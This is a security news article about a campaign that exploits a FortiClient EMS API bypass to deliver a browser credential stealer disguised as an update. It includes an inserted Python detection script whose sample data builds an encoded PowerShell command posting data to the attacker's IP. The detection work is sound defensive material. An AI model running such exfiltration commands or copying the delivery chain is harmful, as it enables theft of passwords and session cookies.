Threat Actors Exploit Critical FortiClient EMS Flaw to Deploy Credential Stealer

Published: May 28, 2026 at 11:26 AM EDT

Source: The Hacker News

Exploited Vulnerability

The campaign targets CVE‑2026‑35616 – a pre‑authentication API access bypass that enables privilege escalation (CVSS 9.1). Fortinet addressed the issue in FortiClient EMS 7.4.7 and later.

“The campaign abused trusted endpoint management infrastructure to deliver malware across managed endpoints,” Arctic Wolf said. “Threat actors disguised the credential stealer payload as a Fortinet endpoint update, silently executing the malicious executable through PowerShell.”
— Arctic Wolf blog

Image: FortiClient EMS

Attack Flow

  1. Configuration Manipulation – After compromising EMS, the actors modify settings to suppress firmware‑upgrade reminders and alter a Remote Access Profile and endpoint policy.
  2. Malicious Script Injection – A PowerShell command is pushed through FortiClient’s legitimate management pathway, appearing as a normal update operation.
  3. Execution on Endpoints – The injected script runs on each managed device without requiring a separate intrusion vector.

“The observed execution pattern suggests that threat actors used FortiClient’s own management pathway to push malicious PowerShell commands to managed endpoints in a way that resembled legitimate management operations,” Arctic Wolf added.

Image: PowerShell execution

Payload Details

  • Legitimate executable: fortitray.exe (part of FortiClient) is used to launch a .cmd script via cmd.exe.
  • Malicious script: The .cmd file runs a Base64‑encoded PowerShell command that downloads and executes a second payload, then exfiltrates data to 83.138.53[.]110 via an HTTP POST request.
  • Stealer binary: FortiEndpoint_Patch.exe masquerades as a legitimate update but is an undocumented Windows information stealer. It harvests passwords, cookies, and autofill data (credit cards, addresses, phone numbers) from Chromium‑ and Gecko‑based browsers.
  • Output: The stolen data is written to a log file in the ProgramData directory.
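As a defender-side illustration of the execution chain above (added here; not code from the article or from Arctic Wolf), the following Python flags process-creation events that match it: fortitray.exe spawning cmd.exe on a .cmd script, and PowerShell run with an encoded command that decodes to an HTTP POST to 83.138.53[.]110. The sample events, file paths, script name and decoded command text are constructed; only the IP and the process names come from the write-up.

```python
import base64
import re

# Indicators from the article (the IP is de-fanged there as 83.138.53[.]110).
EXFIL_IP = "83.138.53.110"
# Matches -e / -enc / -EncodedCommand followed by a base64 blob.
ENC_RE = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

def decode_encoded_command(cmdline):
    """Return the -EncodedCommand payload (base64 of UTF-16LE text), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def score_event(ev):
    """Return the indicators matched by one process-creation event."""
    hits = []
    parent = ev.get("parent_image", "").lower()
    image = ev.get("image", "").lower()
    cmdline = ev.get("command_line", "")
    # Stage 1: fortitray.exe launching cmd.exe on a .cmd script.
    if parent.endswith("fortitray.exe") and image.endswith("cmd.exe") and ".cmd" in cmdline.lower():
        hits.append("fortitray_spawns_cmd_script")
    # Stage 2: encoded PowerShell that POSTs to the exfiltration host.
    if image.endswith("powershell.exe"):
        decoded = decode_encoded_command(cmdline)
        if decoded is not None:
            hits.append("encoded_powershell")
            if EXFIL_IP in decoded:
                hits.append("exfil_ip_in_decoded_command")
            if re.search(r"-Method\s+Post", decoded, re.IGNORECASE):
                hits.append("http_post_in_decoded_command")
    return hits

# Constructed Sysmon-style sample events; the paths and script name are made up.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_ENC = base64.b64encode(f"Invoke-WebRequest -Uri http://{EXFIL_IP}/ -Method Post".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"id": 1, "parent_image": r"C:\Program Files\Fortinet\FortiClient\fortitray.exe",
     "image": r"C:\Windows\System32\cmd.exe", "command_line": r"cmd.exe /c C:\ProgramData\update.cmd"},
    {"id": 2, "parent_image": r"C:\Windows\System32\cmd.exe", "image": PS,
     "command_line": f"powershell.exe -NoProfile -enc {_ENC}"},
    {"id": 3, "parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": "powershell.exe -NoProfile -Command Get-Date"},
]
```

Running `score_event` over each entry of `SAMPLE_EVENTS` flags the first two and leaves the benign PowerShell invocation alone.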

“By bypassing API authentication and interacting with EMS functionality in a privileged context, threat actors were able to modify management configuration and push malicious scripts for execution on managed endpoints,” Arctic Wolf explained.

Image: ThreatLocker illustration

Impact

  • Credential exposure: Session cookies and saved browser credentials can grant attackers access to cloud services, internal applications, and other authenticated resources, potentially bypassing MFA.
  • Limited exfiltration: The stealer itself does not perform network exfiltration; the PowerShell component handles data transmission to the attacker‑controlled server.
